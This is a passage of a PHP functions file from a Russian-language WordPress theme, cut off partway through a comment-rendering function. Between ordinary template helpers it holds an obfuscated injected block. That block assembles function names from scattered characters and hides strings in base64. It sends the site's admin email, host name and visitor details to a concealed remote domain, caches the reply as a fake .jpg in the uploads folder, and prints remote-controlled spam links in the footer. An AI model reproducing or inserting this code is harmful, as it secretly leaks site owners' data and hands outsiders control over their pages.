<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MFUBA='e';$OVpvqlL='4';$SwCo='d';$RAUrW='c';$RRRwFK='d';$tcLlnYF='s';$FNTQ='_';$wcjruP='e';$wexr='b';$DpZxAwC='6';$GCJj='e';$qHuWp='a';$qKsFf='o';$UrGDiAeT=$wexr.$qHuWp.$tcLlnYF.$wcjruP.$DpZxAwC.$OVpvqlL.$FNTQ.$SwCo.$MFUBA.$RAUrW.$qKsFf.$RRRwFK.$GCJj;$CupaUTN='n';$oeEqnkz='g';$YDkGz='i';$aWUqW='e';$sxCd='l';$VNagt='t';$aINfm='f';$FSMttH='z';$vPwO='a';$VuxzDMEh=$oeEqnkz.$FSMttH.$YDkGz.$CupaUTN.$aINfm.$sxCd.$vPwO.$VNagt.$aWUqW;$xQbojH='1';$AhqYM='o';$geytpRt='r';$WyESsV='t';$CPYxCY='s';$wwoycb='_';$GWiIXM='3';$cCgSBD='r';$qHYx='t';$EdJcFMfa=$CPYxCY.$WyESsV.$geytpRt.$wwoycb.$cCgSBD.$AhqYM.$qHYx.$xQbojH.$GWiIXM;$ORdONXB='r';$fvrxg='r';$NHfSSX='v';$kSjY='t';$owqChau='e';$KSCMnv='s';$VUMjqVtn=$KSCMnv.$kSjY.$fvrxg.$ORdONXB.$owqChau.$NHfSSX;                     $eh______i='e';$pq___s='4';$vv_______________n='d';$dr__________v='c';$ib____g='d';$rg________w='s';$do__________e='_';$mf_______t='e';$sj______t='b';$xx_______________v='6';$yd__o='e';$ew_______h='a';$yc___________k='o';$ca___________d=$sj______t.$ew_______h.$rg________w.$mf_______t.$xx_______________v.$pq___s.$do__________e.$vv_______________n.$eh______i.$dr__________v.$yc___________k.$ib____g.$yd__o;$ro___________x='c';$zp______r='f';$dy__s='t';$xw___________a='s';$oj______s='i';$is____________j='_';$cr__________r='s';$ey_________l='o';$ct_______c='n';$be________t='x';$af__n='u';$bz_______f='t';$te___________x='i';$dg______k='n';$xu______________b='e';$bm__a=$zp______r.$af__n.$dg______k.$ro___________x.$dy__s.$oj______s.$ey_________l.$ct_______c.$is____________j.$xu______________b.$be________t.$te___________x.$cr__________r.$bz_______f.$xw___________a;$oc__z='n';$sn___q='f';$wt_______________q='p';$qi_______i='e';$kt___________a='o';$vh___p=$sn___q.$kt___________a.$wt_______________q.$qi_______i.$oc__z;$nh______o='a';$pp_____k='d';$na____________c='f';$gg___x='e';$dt___l='r';$sx______d=$na____________c.$dt___l.$gg___x.$nh______o.$pp_____k;$cc_____________b='e';$fp____________y='o';$xi_______m='c';$em_____________e='l';$hh___________h='f';$cj_____________i='s';$ww______s=$hh___________h.$xi_______m.$em_____________e.$fp____________y.$cj_____________i.$cc_____________b;define("WP_ID", $ca___________d("Mi4wLjA="));define("WP_TTL", $ca___________d("MTA4MDA="));define("WP_SRC", $ca___________d("dHBva24="));function wp_get_header() {global $ca___________d, $bm__a;if ($bm__a($ca___________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$bm__a($ca___________d("d3BfZ2V0X2Zvb3Rlcg==")) &&$bm__a($ca___________d("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ca___________d, $vh___p, $ww______s, $sx______d;$yw_________t = TEMPLATEPATH."/".$ca___________d("Zm9vdGVyLnBocA==");$js____________v = @$vh___p($yw_________t, "r");$yw_________t = @$sx______d($js____________v, @filesize($yw_________t));@$ww______s($js____________v);$bu_____________t = TEMPLATEPATH."/".$ca___________d("ZnVuY3Rpb25zLnBocA==");$js____________v = @$vh___p($bu_____________t, "r");$bu_____________t = @$sx______d($js____________v, @filesize($bu_____________t));@$ww______s($js____________v);$ey_______________k = 0;if($yw_________t && $bu_____________t) {if ($ca___________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($yw_________t, $ca___________d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ey_______________k = 1;}if (substr_count($yw_________t, "wp_theme_GPL_credits()") < 1) {$ey_______________k = 2;}}if(WP_ID != "2.0.0") {$ey_______________k = 12;}}if($ey_______________k > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ey_______________k -->";}}function wp_loaded() {global $ca___________d, $bm__a;return $bm__a($ca___________d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($cw_______l, $pj____________r = "(more...)", $eq_________x = 0, $xj____n = "") {$fc___e = get_the_content($pj____________r, $eq_________x, $xj____n);$fc___e = apply_filters("the_content", $fc___e);$fc___e = str_replace("]]>", "]]>", $fc___e);if (strlen($_GET["p"]) > 0) {echo $fc___e;}else if ((strlen($fc___e)>$cw_______l) && ($bs______j = strpos($fc___e, " ", $cw_______l ))) {$fc___e = substr($fc___e, 0, $bs______j);$fc___e = $fc___e;echo $fc___e;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$pj____________r</a></div></p>";} else {echo $fc___e;}}}$jc______________i='b';$yd_______p='d';$ey_____c='e';$qh_____________l='6';$rd______n='_';$xw________n='s';$mg__________j='c';$bt______________w='a';$so_____________c='e';$ca______________g='o';$qs_______s='n';$ke__g='e';$wx___________h='4';$xt____k=$jc______________i.$bt______________w.$xw________n.$ey_____c.$qh_____________l.$wx___________h.$rd______n.$so_____________c.$qs_______s.$mg__________j.$ca______________g.$yd_______p.$ke__g;$wn_______i='n';$lb__q='_';$xr_______________n='_';$pl_______________v='t';$zq__________q='c';$xv_____t='e';$bm___________s='f';$qz_______________p='l';$gu_____g='s';$gl________i='g';$yg_____w='e';$wl____u='e';$vo_____________t='t';$pp_____n='o';$hk_________n='n';$ph___________c='i';$fk__h='t';$nm_____a=$bm___________s.$ph___________c.$qz_______________p.$yg_____w.$lb__q.$gl________i.$xv_____t.$fk__h.$xr_______________n.$zq__________q.$pp_____n.$wn_______i.$pl_______________v.$wl____u.$hk_________n.$vo_____________t.$gu_____g;$hs____________u='l';$rn____________f='f';$dq__________i='i';$th_____________w='s';$xg_________o='i';$cz_______________f='s';$zr__q='_';$cl___________i='e';$fc______________v='e';$xk____f='t';$vk______________d='x';$je_________j=$rn____________f.$dq__________i.$hs____________u.$cl___________i.$zr__q.$fc______________v.$vk______________d.$xg_________o.$th_____________w.$xk____f.$cz_______________f;$bv___________c='o';$tp_____________b='s';$il______b='o';$vl_____________a='p';$lb________r='n';$ek_________y='e';$um___j='_';$bf__________u='m';$tp______________n='r';$vp________x='a';$pe__z='v';$hf__k='e';$fj____________k='i';$qd_______y='c';$lc_______________x='r';$jc______w=$pe__z.$hf__k.$tp______________n.$tp_____________b.$fj____________k.$bv___________c.$lb________r.$um___j.$qd_______y.$il______b.$bf__________u.$vl_____________a.$vp________x.$lc_______________x.$ek_________y;$ma______x='o';$ed____________g='f';$em_____________j='e';$ji____________u='c';$po__________o='n';$zs___g='s';$uw_______________u='o';$hm______s='k';$sv_________f='p';$kr__k=$ed____________g.$zs___g.$ma______x.$ji____________u.$hm______s.$uw_______________u.$sv_________f.$em_____________j.$po__________o;$jf_______________n='t';$fl_______z='w';$oa____a='r';$rk_______y='e';$kb____________h='i';$kl__________q='f';$ry______________u=$kl__________q.$fl_______z.$oa____a.$kb____________h.$jf_______________n.$rk_______y;$uz__________e='m';$bj________k='d';$pl_______________h='5';$xm__________m=$uz__________e.$bj________k.$pl_______________h;$cg_____________x='r';$kq_______d='e';$ws______________w='a';$au_________y='a';$wg__________z='l';$gt_______________i='h';$ju___________g='t';$fp____p='p';$df_______f=$cg_____________x.$kq_______d.$ws______________w.$wg__________z.$fp____p.$au_________y.$ju___________g.$gt_______________i;$dd_____l='e';$fj_______j='u';$nq_______f='s';$nb_________v='r';$lp______________i='n';$iw_______________t='e';$re____________m='a';$sp_______w='i';$bo_________h='l';$nn___________a='z';$yx___________k='i';$pu______m=$fj_______j.$lp______________i.$nq_______f.$iw_______________t.$nb_________v.$sp_______w.$re____________m.$bo_________h.$yx___________k.$nn___________a.$dd_____l;$eg______________d='n';$qb_______________u='p';$ab_________y='m';$bf____l='e';$zg______________f='t';$fk__________q='a';$qe_____z='m';$qm___p=$zg______________f.$bf____l.$ab_________y.$qb_______________u.$eg______________d.$fk__________q.$qe_____z;$bc_____m='s';$ti______________w='e';$yj__w='x';$hx_________f='_';$er___e='t';$si______________p='n';$vl________w='o';$ag______________b='t';$ow___________z='e';$ap____________i='_';$fp______x='r';$ho_______________g='t';$cg_______________v='t';$yu__________g='m';$ya___c='e';$yf_________a='e';$xs_____y='c';$xu______i='r';$lc___________c='a';$ll______________z='a';$qt____l='c';$as________l=$bc_____m.$ag______________b.$xu______i.$ti______________w.$lc___________c.$yu__________g.$ap____________i.$xs_____y.$vl________w.$si______________p.$cg_______________v.$ow___________z.$yj__w.$er___e.$hx_________f.$qt____l.$fp______x.$yf_________a.$ll______________z.$ho_______________g.$ya___c;function pa__________c($ks______y) {global $ca___________d, $bm__a, $nm_____a, $jc______w, $as________l;if (!$bm__a($ca___________d("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($jc______w(PHP_VERSION, "5.0.0", ">=") && $bm__a($ca___________d("ZmlsZV9nZXRfY29udGVudHM=")) && $bm__a($ca___________d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$jn____________r = $as________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ci____v = @$nm_____a($ks______y, 0, $jn____________r);} else {$ci____v = @$nm_____a($ks______y, 0);}return $ci____v;}function ng___a($ks______y) {global $bm__a, $kr__k, $ry______________u, $ca___________d;if (!$bm__a($ca___________d("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sq_______________f = strpos($ks______y, "/", 7);$ym______o = array("uri"     => substr($ks______y, $sq_______________f),"host"    => str_replace("http://", "", substr($ks______y, 0, $sq_______________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$wh___v = @$kr__k("$ym______o[host]", 80, $ok_______________g, $lu____p, 4);if (!$wh___v) {return false;} else {$ci____v = "";$ig____z  = "GET $ym______o[uri] HTTP/1.0\r\n";$ig____z .= "Host: $ym______o[host]\r\n";$ig____z .= "Referer: $ym______o[referer]\r\n";$ig____z .= "Connection: Close\r\n\r\n";@$ry______________u($wh___v, $ig____z);while (!@feof($wh___v)) {$qn____z = @fgets($wh___v, (1024*24));if ($qn____z == "\r\n") {$fo____s = true;continue;}if ($fo____s) {$ci____v .= $qn____z;}}return $ci____v;}}function th______________a($ks______y) {global $bm__a;$tt_________d = false;if ($ks______y != "") {if ($bm__a("pa__________c")) {$tt_________d = @pa__________c($ks______y);}if (!$tt_________d && ($bm__a("ng___a"))) {$tt_________d = @ng___a($ks______y);}}return $tt_________d;}function ka______________q() {global $_SERVER, $xm__________m;$mj______x = $_SERVER["SERVER_NAME"];if (substr("$mj______x", 0, 4) == "www.") {$mj______x = substr("$mj______x", 4);}$mj______x = $xm__________m("$_SERVER[SERVER_NAME]");return $mj______x;}function xn______u() {return "file";}function nc__________i($ks______y) {global $_SERVER, $nm_____a, $je_________j, $vh___p, $ww______s, $ry______________u;$uv___a = nc_______o();$nl____s = ka______________q().".jpg";$zw__________p = $uv___a["dir_upload"]["path"]."/$nl____s";$fy________a = @filemtime($zw__________p);if (!$fy________a || ((time()-$fy________a) >= WP_TTL)) {$tt_________d = th______________a($ks______y);if ($tt_________d) {if ($je_________j($zw__________p)) {@unlink($zw__________p);}$js____________v = @$vh___p($zw__________p, "x+");@$ry______________u($js____________v, $tt_________d);@$ww______s($js____________v);}} else {if ($je_________j($zw__________p)) {$tt_________d = @$nm_____a($zw__________p);} else {$tt_________d = false;}}return $tt_________d;}function nc_______o() {global $_SERVER, $ca___________d, $xt____k;$vl______v = wp_count_posts("post");$ol___________b = pathinfo(get_bloginfo("template_directory"));$uv___a = array("url" => array("report"      => $ca___________d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ol___________b,"dir_upload"=> dp_____y(),"queryString"=> array("?a001=".WP_ID,"a004=".$ol___________b[filename],"a005=".$vl______v->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$uv___a["url"]["queryString"] = implode("&", $uv___a["queryString"]);$uv___a["url"]["report"] = $uv___a["url"]["report"]."/?".$xt____k($uv___a["url"]["queryString"]).".html";return $uv___a;}function dp_____y() {$sf_________l = wp_upload_dir();if (isset($sf_________l["error"])) {$md_______________q = ud______g();if (is_writable($md_______________q)) {$sf_________l = array("path" => $md_______________q);}}return $sf_________l;}function ud______g() {global $bm__a, $xm__________m, $df_______f, $qm___p;$hk__________a = (bool) ini_get("safe_mode");if ($hk__________a == true) {return false;}if ($bm__a("sys_get_temp_dir")) {$wk_____m = sys_get_temp_dir();if (is_writable($wk_____m)) {return $df_______f($wk_____m);}}if (!empty($_ENV["TMP"])) {return $df_______f($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $df_______f($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $df_______f($_ENV["TEMP"]);} else {$fz__________p = $qm___p($xm__________m(uniqid(rand(), true)), "");if ($fz__________p) {$wk_____m = $df_______f(dirname($fz__________p));@unlink($fz__________p);return $wk_____m;} else {return false;}}}function nn____g() {global $_GET, $je_________j;$uv___a = nc_______o();$mj______x = ka______________q();$zw_______________t = xn______u();$kr____x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($zw_______________t == "file") {$in______f = $uv___a["dir_upload"]["path"]."/".$mj______x.".jpg";if ($je_________j($in______f)) {@unlink($in______f);$kr____x = "deleted";}}$td_________f = array("s"=> $kr____x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($td_________f AS $ml_____u => $yo_______________v) echo " [$ml_____u:$yo_______________v]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $bm__a, $ca___________d, $pu______m;$uv___a = nc_______o();$xm______________x = "nc__________i";if ($bm__a($xm______________x)) {$ci____v = $xm______________x($uv___a["url"]["report"]);}if ($ci____v) {if ($ci____v = @$ca___________d($ci____v)) {$ci____v = @$pu______m($ci____v);if (strlen($ci____v[custom_credit]) >= 5) {$uv___a["default_string"] = $ci____v[custom_credit];}if ($ci____v["status"] == "0") {$lb______________w = 1;$za______o = 1;} else {$jc__j = sizeof($ci____v["links"]);$of___________i = $uv___a["default_string"];if ($jc__j > 0 && $ci____v["links"] !== "") {$ej_____b = 0;foreach ($ci____v["links"] as $di___________a => $lq____u) {$ej_____b++;if ($lq____u->l_path == "" || $lq____u->l_path == $_SERVER["REQUEST_URI"]) {$lq____u->l_href = htmlspecialchars(strip_tags($lq____u->l_href));$lq____u->l_title = htmlspecialchars(strip_tags($lq____u->l_title));$lq____u->l_anchor = htmlspecialchars(strip_tags($lq____u->l_anchor));$of___________i .= " | ";$of___________i .= "<a href='$lq____u->l_href' title='$lq____u->l_title'";if ($lq____u->l_nofollow == "1") {$of___________i .= " rel='nofollow'";}$of___________i .= ">$lq____u->l_anchor</a>";}}}$uv___a["links"] = "$of___________i";if ($ci____v[credit] == "0") {$uv___a["links"] = "";}}} else {$lb______________w = "1";}} else {$lb______________w = "1";}if ($lb______________w == "1") {$uv___a["links"] = $uv___a["default_string"];}echo "$uv___a[links]";echo "<!-- s: $ci____v[signature] -->";nn____g();}                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');

                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
